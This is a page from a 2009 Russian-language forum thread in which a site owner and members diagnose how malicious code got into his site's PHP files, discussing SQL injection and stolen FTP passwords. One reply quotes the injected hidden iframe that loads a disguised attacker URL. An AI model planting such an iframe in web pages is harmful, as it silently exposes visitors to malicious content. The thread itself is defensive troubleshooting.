Есть вопрос?
Зайди на форум

Поиск на сайте: Advanced

Denix - новый дистрибутив Linux. Русификация Ubuntu и установка кодеков

dkws.org.ua
Форум сайта dkws.org.ua
 
Главная    ТемыТемы    АльбомАльбом    РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Как обеспечить безопасность сайта?
На страницу Пред.  1, 2
 
Начать новую тему Ответить на тему    Список форумов dkws.org.ua -> Безопасность
 
Автор Сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 12:24 pm    Заголовок сообщения:
Ответить с цитатой

Да, я честно говоря не раз жалел, что мы связались с "Кельник-студиос". И не удивительно, что нашего сайта у них в портфолио нет. У них на витрине одно, а в реальности несколько другое. Во-первых, они делали его больше года! Во-вторых, делали его по-видимому, весьма неопытные дизайнеры и программисты. Я так подозреваю, что у них есть 1-2 действительно стоящих, но они заняты только на очень дорогих проектах. А работать с ними было одно мучение. Когда я им говорил, что надо сделать ещё это, то они отвечали: "С какой стати? Мы об этом не договаривались." Приходилось указывать строку в договоре, где сказано, что договаривались. Потом они дня по 3 убеждали нас, что делать этого не надо, что и так хорошо, когда сделать это можно было за 2 часа. Потом после убедительных просьб, давлений или откровенных угроз всё-таки делали. И так в течение года.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 12:28 pm    Заголовок сообщения:
Ответить с цитатой

Никаких строк типа: "Powered by PunBB" или "Сайт работает на UMI.CMS" я тоже нигде не нашёл, ни в админке ни в файлах. Возможно, это их собственная разработка.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Tuxik

Тяпницо


Зарегистрирован: 02.07.2007
Сообщения: 1521

СообщениеДобавлено: Вт Сен 15, 2009 12:43 pm    Заголовок сообщения:
Ответить с цитатой

Значит, скорее всего, вас "подсадили на иглу", чтобы вы обращаться в Кельник-студиос за технической поддержкой...
Или искать профессионала, который разберется в их работе.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 12:57 pm    Заголовок сообщения:
Ответить с цитатой

Tuxik, не знаю насчёт подсаживания. Мы уже больше года сами справляемся. В общем, там система администрирования вполне работоспособная, к тому-же я нашёл лазейку и присвоил себе права администратора, которых по началу мне не дали.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 1:00 pm    Заголовок сообщения:
Ответить с цитатой

Меня интересует вообще-то, возможно ли проникновение вирусов кроме варианты кражи пароля? Если такие варианты существуют, то как этому противодействовать?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 13870
Откуда: Кировоград, Украина

СообщениеДобавлено: Вт Сен 15, 2009 2:56 pm    Заголовок сообщения:
Ответить с цитатой

sql-инъекция, когда код вируса заносится в бд, а потом выводится вместе с другой инфой...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 3:42 pm    Заголовок сообщения:
Ответить с цитатой

И он попадает в файлы *.php?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 3:44 pm    Заголовок сообщения:
Ответить с цитатой

А каков механизм его попадания в БД?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 13870
Откуда: Кировоград, Украина

СообщениеДобавлено: Вт Сен 15, 2009 4:07 pm    Заголовок сообщения:
Ответить с цитатой

В PHP-файлы обычно попадают вирусы путем кражи паролей. Часть вируса крадет пароль и внедряет в ПХП-файл вторую часть вируса
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 4:23 pm    Заголовок сообщения:
Ответить с цитатой

А вирус откуда? С компьютера администратора сайта?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
yok

Участник тусовки


Зарегистрирован: 06.02.2008
Сообщения: 260
Откуда: krasnodar

СообщениеДобавлено: Ср Сен 16, 2009 6:08 am    Заголовок сообщения:
Ответить с цитатой

Думаю, надо локализовать причину возникновения этой строки
<ifrme src="http://kораеvа.sеrvеgаmе.соm:8О8О/ts/in.cgi?ореn6" width=821 height=0 style="visibility: hidden">
Значит что за файлы в которых она присутствует?
Как они создавались, генерировались, из базы данных взяты ли элементы, из какого сценария?
Сервер университета тоже исключать думаю не стоит из области видимости причины.
А если дата остальных 2008, то понимаю что они статические. Значит чтобы модифицировать их необходимо право на запись. Что за права у файлов. Искать причину изменения прав.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Завсегдатай


Зарегистрирован: 25.01.2009
Сообщения: 492
Откуда: С-Петербург, Россия

СообщениеДобавлено: Ср Сен 16, 2009 10:05 am    Заголовок сообщения:
Ответить с цитатой

В первую очередь, это был файл index.php и ещё 3 файла в системе администрирования. Они статические. С первого из них, как я понимаю и начинается открытие главной страницы сайта, это аналог index.html в статических сайтах. А насчёт прав, при доступе по ftp их конечно же можно стирать, записывать и соответственно модифицировать.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Anton99

Neo


Зарегистрирован: 26.11.2006
Сообщения: 1676

СообщениеДобавлено: Ср Сен 16, 2009 7:30 pm    Заголовок сообщения:
Ответить с цитатой

не читал всю тему, но, чтобы определить движок сайта, можно использовать плагин Wappalyzer для Firefox.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
yok

Участник тусовки


Зарегистрирован: 06.02.2008
Сообщения: 260
Откуда: krasnodar

СообщениеДобавлено: Пт Сен 18, 2009 9:07 am    Заголовок сообщения:
Ответить с цитатой

Значит на индексном файле есть вывод злополучного фрейма. Если дата создания не меняется, значит как вариант, - он подкачивает какойто блок, происхождение которого необходимо выяснить. Возможно он генерируется каким либо сценарием и вот тут понабобиться знание кода.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему Ответить на тему    Список форумов dkws.org.ua -> Безопасность Часовой пояс: GMT
На страницу Пред.  1, 2
Страница 2 из 2
 Главная страница сайта
 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
© Колисниченко Денис